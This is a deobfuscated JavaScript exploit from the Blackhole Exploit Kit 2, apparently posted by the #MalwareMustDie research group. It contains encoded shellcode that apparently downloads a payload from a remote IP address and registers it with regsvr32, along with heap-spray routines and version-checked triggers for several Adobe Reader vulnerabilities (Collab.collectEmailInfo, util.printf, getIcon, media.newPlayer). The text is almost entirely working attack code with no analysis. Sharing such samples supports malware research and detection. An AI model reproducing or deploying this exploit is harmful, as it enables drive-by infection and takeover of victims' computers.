#MalwareMustDie - BHEK2/PluginDetect0.7.9-PDF/JS-deobs

1. bjsg = '
2. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
3. %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
4. %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
5. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
6. %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
7. %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
8. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
9. %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
10. %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
11. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
12. %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
13. %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
14. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
15. %u7468%u7074%u2f3a%u322f%u3330%u382e%u2e30%u3631%u382e%u3a31%u3038%u3038%u662f%u726f%u6d75
16. %u6c2f%u6e69%u736b%u632f%u6c6f%u6d75%u2e6e%u6870%u3f70%u6676%u3d67%u3033%u313a%u3a6e%u6931
17. %u313a%u3a69%u3333%u6326%u6361%u706a%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31
18. %u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u7262%u6279%u3d78%u6831%u6726%u6866%u783d%u6f64
19. %u2671%u7368%u6870%u3d67%u6465%u7869%u6967%u6c64%u0000';
20. function ezvr(ra, qy){
21.   while (ra.length * 2 < qy){
22.     ra += ra
23.   }
24.   ra = ra.substring(0, qy / 2);
25.   return ra
26. }
27. function bx(){
28.   var dkg = new Array();
29.   var vw = 0x0c0c0c0c;
30.   var addr = 0x400000;
31.   var payload = unescape(bjsg);
32.   var sc_len = payload.length * 2;
33.   var qy = addr - (sc_len + 0x38);
34.   var yarsp = unescape("%u9090%u9090");
35.   yarsp = ezvr(yarsp, qy);
36.   var count2 = (vw - 0x400000) / addr;
37.   for (var count = 0; count < count2; count ++ ){
38.     dkg[count] = yarsp + payload
39.   }
40.   var overflow = unescape("%u0c0c%u0c0c");
41.   while (overflow.length < 44952){
42.     overflow += overflow
43.   }
44.   this .collabStore = Collab.collectEmailInfo({
45.     subj : "", msg : overflow
46.   }
47.   )
48. }
49. function printf(){
50.   nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
51.   var payload = unescape(bjsg);
52.   heapblock = nop + payload;
53.   bigblock = unescape("%u0A0A%u0A0A");
54.   headersize = 20;
55.   spray = headersize + heapblock.length;
56.   while (bigblock.length < spray){
57.     bigblock += bigblock
58.   }
59.   fillblock = bigblock.substring(0, spray);
60.   block = bigblock.substring(0, bigblock.length - spray);
61.   while (block.length + spray < 0x40000){
62.     block = block + block + fillblock
63.   }
64.   mem = new Array();
65.   for (i = 0; i < 1400; i ++ ){
66.     mem[i] = block + heapblock
67.   }
68.   var num =
69. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
70. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
71. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
72. 88888888888888888888888888;
73.   util.printf("%45000f", num)
74. }
75. function geticon(){
76.   var arry = new Array();
77.   if (app.doc.Collab.getIcon){
78.     var payload = unescape(bjsg);
79.     var hWq500CN = payload.length * 2;
80.     var qy = 0x400000 - (hWq500CN + 0x38);
81.     var yarsp = unescape("%u9090%u9090");
82.     yarsp = ezvr(yarsp, qy);
83.     var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
84.     for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
85.       arry[vqcQD96y] = yarsp + payload
86.     }
87.     var tUMhNbGw = unescape("%09");
88.     while (tUMhNbGw.length < 0x4000){
89.       tUMhNbGw += tUMhNbGw
90.     }
91.     tUMhNbGw = "N." + tUMhNbGw;
92.     app.doc.Collab.getIcon(tUMhNbGw)
93.   }
94. }
95. aPlugins = app.plugIns;
96. var sv = parseInt(app.viewerVersion.toString().charAt(0));
97. for (var i = 0; i < aPlugins.length; i ++ ){
98.   if (aPlugins[i].name == 'EScript'){
99.     var lv = aPlugins[i].version
100.   }
101. }
102. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
103.   geticon()
104. }
105. else if (lv == 7.1){
106.   printf()
107. }
108. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
109.   bx()
110. }
111. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
112.   function a(){
113.     util.printd('p@111111111111111111111111 : yyyy111', new Date())
114.   }
115.   var h = app.plugIns;
116.   for (var f = 0; f < h.length; f ++ ){
117.     if (h[f].name == 'EScript'){
118.       var i = h[f].version
119.     }
120.   }
121.   if ((i > 8.12) && (i < 8.2)){
122.     c = new Array();
123.     var d = unescape('%u9090%u9090');
124.     var e = unescape(bjsg);
125.     while (d.length <= 0x8000){
126.       d += d
127.     }
128.     d = d.substr(0, 0x8000 - e.length);
129.     for (f = 0; f < 2900; f ++ ){
130.       c[f] = d + e
131.     }
132.     a();
133.     a();
134.     try {
135.       this .media.newPlayer(null)
136.     }
137.     catch (e){
138.     }
139.     a()
140.   }
141. }